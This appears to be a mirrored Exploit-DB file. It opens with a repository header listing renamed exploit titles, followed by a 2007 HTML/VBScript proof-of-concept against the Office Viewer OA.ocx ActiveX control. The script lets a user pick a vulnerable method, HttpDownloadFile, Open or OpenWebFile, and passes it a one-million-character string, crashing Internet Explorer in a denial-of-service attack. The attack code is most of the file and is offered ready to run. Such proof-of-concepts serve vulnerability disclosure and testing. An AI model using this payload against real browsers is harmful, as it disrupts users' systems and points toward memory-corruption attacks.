exploit-db-mirror/platforms/windows/dos/3845.html
Offensive Security 477bcbdcc0 DB: 2016-03-17
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

60 lines
2 KiB
HTML
Executable file

<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/04</b></p></span>
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
<b>Office Viewer (OA.ocx v. 3.2.0.5) multiple methods Denial of Service</b>
url: http://www.officeocx.com/
price: from �77.95 (update to last version) to �1,558.95 (Royalty)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to these exploits.
Theese methods are vulnerable too:
<b>DoOleCommand</b>
<b>FTPDownloadFile</b>
<b>FTPUploadFile</b>
<b>HttpUploadFile</b>
<b>Save</b>
<b>SaveWebFile</b>
-----------------------------------------------------------------------------
<object classid='clsid:18A295DA-088E-42D1-BE31-5028D7F9B9B5' id='target' width="405" height="50"></object>
<select style="width: 404px" name="Pucca">
<option value = "HttpDownloadFile">HttpDownloadFile</option>
<option value = "Open">Open</option>
<option value = "OpenWebFile">OpenWebFile</option>
<option value = "Quoting">Quoting...</option>
</select>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'>
Sub tryMe
on error resume next
Dim MyMsg
if Pucca.value = "HttpDownloadFile" then
argCount = 2
arg1=String(1000000,"A")
arg2="defaultV"
target.HttpDownloadFile arg1, arg2
elseif Pucca.value = "Open" then
argCount = 1
arg1=String(1000000, "A")
target.Open arg1
elseif Pucca.value = "OpenWebFile" then
argCount = 1
arg1=String(1000000, "A")
target.OpenWebFile arg1
else
MyMsg = MsgBox ("I wanna feel like I�m somewhere I belong",64 ,"2007/05/04 - Office Viewer 3.2")
end if
End Sub
</script>
</span></span>
</code></pre>
# milw0rm.com [2007-05-04]